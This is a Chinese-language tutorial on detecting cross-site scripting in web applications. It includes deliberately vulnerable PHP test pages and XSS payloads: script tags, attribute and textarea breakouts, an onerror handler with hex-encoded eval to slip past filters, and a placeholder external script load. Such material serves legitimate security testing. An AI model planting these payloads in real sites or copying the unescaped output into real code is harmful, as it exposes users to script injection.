安全测试 web应用安全测试之XXS跨站脚本攻击检测
说明
意在对XSS跨站脚本攻击做的简单介绍,让大家对xss攻击有个初步认识,并能够在实际工作当中运用本文所述知识做些简单的、基础性的XSS攻击检测。
定义
XSS攻击:类似sql注入,简单说,通过“HTML注入”,把用户输入的数据当作脚本执行。进而达到想要的目的,这种目的通常是恶意。
分类
反射型XSS(非持久型XSS):
简单说可充当执行脚本的恶意数据,需由用户从“外部”输入,通过提交输入的方式“嵌入”到网页。
简单举例:
针对存在XSS攻击的某个网页输入框中输入“恶意数据”,并提交,通常,这类提交操作对应着一个get请求,当我们把这个请求发送给其他用户,并让用户在web浏览器中打开请求,这时就会把恶意数据当作脚本再次执行
存储型XSS(持久型XSS)
类似反射型XSS,不同的是,其“恶意数据”本身就是包含在网页源码中、或者自动从服务器内部读取并“嵌入”网页中。
简单举例:
黑客在某个论坛写了一篇文章,并在文章中写入了用会充当脚本执行的数据,比如一段恶意javascript代码,这样所有浏览该文章的用户,都会自动在其浏览器中执行这段恶意代码。
DOM Bsed XSS
通过修改页面的DOM节点型的XSS,效果上来说也是发射型XSS
举例:
略,参靠下述实验
XSS检测
实验1
构造testxss.php,内容如下
说明:
$xss = empty($_GET['xss_input']) ? '':$_GET['xss_input']; #使用前做判断,防止报类似如下错误:
Notice: Undefined index: xss_input in xxx\xx.php on line xxx 报错
$_GET 变量是一个数组,元素索引和元素值分别是由 HTTP GET 方法发送的变量名称和值。
$_GET 变量用于收集来自 method="get" 的表单中的值。
请求上述testxss.php文件,并在打开页面的输入框中输入测试数据
输入测试数据: “shouke”,提交查询,结果如下:
说明:正常情况如上,用户输入的数据不被当作脚本执行,用于但不局限于在浏览器端展示
输入测试数据: ,提交查询,结果如下:
说明:非正常情况如上,用户输入的数据被当作脚本执行,说明存在xss攻击
实验2
构造testxss2.php,内容如下
请求上述testxss2.php文件,并在打开页面的输入框中输入测试数据
第一个输入框中输入测试数据:"><!--
第二个输入框中输入测试数据:--><script>alert('xss')</script>
提交查询,结果如下
查看执行后展示页面的源代码
说明:如上,第三、第四个输入框分别从第一个和第二个输入框获中取值,获取后如下
<input type="text" value=""><!--">
<br>
<input type="text" value="--><script>alert('xss')</script>">,显而易见,中间部分被当作注释掉了
实验3
构造testxss3.php,内容如下
构造testxss3.php,内容如下
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset="utf-8" />
<title>利用监听事件执行xss</title>
</head>
<body>
<form action="" method="get">
<input type="text" name="xss_input_value" value="输入要展示的字符">
<input type="submit">
</form>
<hr>
<?php
$xss = empty($_GET['xss_input_value']) ? '':$_GET['xss_input_value'];
if(isset($xss)){
echo '<input type="text" value="'.$xss.'">';
}else{
echo '<input type="type" value="输出">';
}
?>
</body>
</html>请求上述testxss3.php文件,并在打开页面的输入框中输入测试数据
第一个输入框中输入测试数据:" onclick="alert('xss')
然后点击第二个输入框,结果如下
查看执行后展示页面的源代码
如上,提交后,第二个输入框源代码变成 了<input type="text" value="" onclick="alert('xss')">
注:
1、监听事件处理onclick之外,还有别的mouseover等
2、这也说明,input的value是默认值,仅初始化时会加载,对其所做的修改并不会在html页面显示,上例中,第一个输入框输入的值仅在被第二框作为默认值获取时,才产生xss
实验4
构造testxss4.php,内容如下
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset="utf-8" />
<title>解决textarea无法执行script xss</title>
</head>
<body>
<form action="" method="get">
<input type="text" name="xss_input_value" value="输入要展示的字符">
<input type="submit">
</form>
<hr>
<textarea rows=2 cols=50 name="textarea">
<?php
$xss = empty($_GET['xss_input_value']) ? '':$_GET['xss_input_value'];
echo $xss;
?>
</textarea>
</body>
</html>
请求上述testxss4.php文件,并在打开页面的输入框中输入测试数据第一个输入框中输入测试数据:<script>alert('xss')</script>,提交查询,结果,没发现弹窗。
第一个输入框中输入测试数据:</textarea><script>alert('xss')</script>,提交查询,结果如下:
查看执行后展示页面的源代码
注:textarea标签可定义多行的文本输入控件,正常情况下无法执行javascript,通过上述方式可执行xss攻击
其它
除了上述所举,我们还可以通过其它构造方式,比如<iframe>,<img>,<a>标签构造用户输入数据,比如<img/src=# onerror=alert("test")>,当图片载入错误时执行弹窗,以执行xss
注意:onerror事件会在文档或图像加载过程中发生错误时被触发,有时候直接填写<script>alter("test")</script>不起作用时,可以尝试该方式。
构造testxss.php,内容如下
<html>
<head>
<meta http-equiv="Content-Type" content="text/html";charset=utf-8 />
<title>study xss</title>
</head>
<body>
<form action="" method="get">
<input type="text" name="xss_input">
<input type="submit">
</form>
<hr>
<?php
$xss = empty($_GET['xss_input']) ? '':$_GET['xss_input'];
echo '输入的字符为: '.$xss;
?>
</body>
</html>访问上述页面,分别输入以下数据,提交测试,查看效果
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr来弹窗
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>过滤了alert来执行弹窗
<a href=javascript:alert('xss')>s</a> 点击s时运行alert('xss')
总结
如上所举例,实际运用时,还得根据实际环境,构造适当的“输入数据”来进行测试,方能达到预期效果。
注意:上述所例,仅是测试xss存在的可能性,是我们检测xss的手段,并不等同xss。如果存在xss漏洞,我们可以用它来执行其它更具备破坏性的操作,比如输入恶意数据,执行恶意js脚本:
<script scr="js_url"></script>
pdf版下载:web应用安全测试之XXS跨站脚本攻击检测.pdf
腾讯云开发者
